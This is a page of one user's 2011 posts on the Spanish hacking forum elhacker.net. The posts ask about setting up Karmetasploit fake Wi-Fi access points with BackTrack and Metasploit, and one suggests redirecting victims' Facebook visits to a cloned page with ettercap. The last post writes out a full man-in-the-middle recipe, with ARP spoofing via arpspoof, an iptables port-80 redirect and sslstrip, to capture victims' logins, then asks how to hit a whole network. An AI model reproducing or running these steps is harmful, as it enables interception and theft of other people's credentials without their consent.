elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía actualizada para evitar que un ransomware ataque tu empresa


  Mostrar Mensajes
Páginas: [1] 2 3 4 5
1  Seguridad Informática / Hacking / Re: [Libro] [descarga] Metasploit The Penetration Tester en: 11 Octubre 2011, 01:03 am
tenia que sacar un manual mas completo sobre karmetasploit eso si que es una obra de arte!pero buen aporte raul100!!
2  Seguridad Informática / Hacking / Re: Dudas sobre backtrack r1,metasploit y karmetasploit. en: 29 Septiembre 2011, 23:50 pm
si aver lo quiero decir,que se sacar claves wep con backtrack pero a la ahora de crear un AP falso es decir como si fuera un router pero falso para ejecutar el karmetasploit no aparece al escanearlo en otro ordenador con el wifi es decir que no lo crea!

saludos y gracias
3  Seguridad Informática / Hacking / comtremd ct 5361 en: 28 Septiembre 2011, 04:20 am
hola a todos tengo un comtremd 5361 de esos que montaba telefonica en españa,y lo tengo con openwrt la ultima version.y claro quiero saber si se puede poner en modo cliente es decir que el router coja internet de otro router y que se conecten a el,tambien quiero saber si puedo montar con el algo parecido a karmetasploit con el para usarlo como un ap falso pero que existe y da internet.

aver si alguien conoce mas o menos lo que tengo pensado y me hecha una mano
4  Seguridad Informática / Hacking / Dudas sobre backtrack r1,metasploit y karmetasploit. en: 13 Septiembre 2011, 00:55 am
hola a todos tengo varias dudas la primera es que en backtrack 5 r1 no puedo crear el ap falso no me aparece cuando le doy a buscar en otros dispositivos wireless.lo segundo como puedo crear una base de datos para metasploit!y como puedo ejecutar karmetasploit en backtrack 5 r1 si alguien tiene informacion sobre estos temas se lo agredecia

saludos
5  Seguridad Informática / Hacking / Re: Ubuntu 10.04.2 con herramientas backtrack5 en: 8 Septiembre 2011, 13:49 pm
Que acaso yo soy el unico que veo caritas en vez del contenido que afirma el titulo del post? :huh:
Por que no cerrar esto?  :huh:

a mi me pasa lo mismo que a ti
6  Sistemas Operativos / GNU/Linux / Re: Asturix - Una nueva distribución española basada en GNU/Linux en: 7 Septiembre 2011, 23:32 pm
lo probare se podria sacar una version de asturix pero con aplicaciones de backtrack asi equipos antiguos podrian cargar tambien bactrack xD
7  Seguridad Informática / Hacking / Re: Tutorial "Infectando Pc con Backtrack 5 y SET". en: 7 Septiembre 2011, 23:21 pm
yo tengo una idea para incorporar a esta manual!yo se que con el ettercap puedes dirigir una pagina 'Z' del usuario a una pagina 'Y' que en este caso seria la ip y el puerto que da metasploit y entonces no hace falta que el usuario abra la pagina manualmente solo que al abirir facebook.com se autodirige a nuestra pagina clonada no se podria hacer algo asi?

saludos
8  Seguridad Informática / Hacking / Re: [Metasploit] Karmetasploit en: 7 Septiembre 2011, 23:14 pm
hola a todos me he metio en el mundo del karmetasploit xD y lo he probado en ubuntu y por ahora bien a que no he conseguido sesion de metarpreter,tambien quiero que el usuario que se conecte al ap falso pueda navegar para hacerlo mas real!y me gustaria saber si alguie lo ha conseguido hacer funcionar en backtrack 5 r1!

tambien estoy interesado en como incorporarlo a nuestro wifiway 2.0.X

saludos a todos y gracias!
9  Seguridad Informática / Hacking / Re: Ubuntu 10.04.2 con herramientas backtrack5 en: 7 Septiembre 2011, 23:11 pm
ya no esta online?
10  Seguridad Informática / Hacking / Re: Ettercap - Contraseña SSL - Cual es mejor forma? en: 28 Abril 2011, 11:35 am
Gracias por la respuesta,creo que encontré la manera de romper SSL usando sslstrip:

1.- Habilitamos la capacidad para reenvío (routing) del kernel
echo 1 > /proc/sys/net/ipv4/ip_forward   

2.- Comenzamos el envenenamiento ARP
     (arpspoof -i {interfaz_red} -t {ip_victima} {ip_router})
arpspoof -i eth0 -t 192.168.1.100 192.168.1.1

3.- Cambiamos la redireccion de puertos usando las iptables,de esta
     manera,estaremos transparentes para la victima,que podrá logearse
     sin problemas:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

4.- Comenzamos con sslstrip (sslstrip.py -w {nombre_del_archivo_de_captura})
sslstrip -w  miarchivo  

5.- Abrir otra shell si queremos ver en tiempo real la informacion
tail -f miarchivo





se podria hacer para que lo haga con toda la red a la vez o solo se puede con un pc a la vez??
Páginas: [1] 2 3 4 5
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines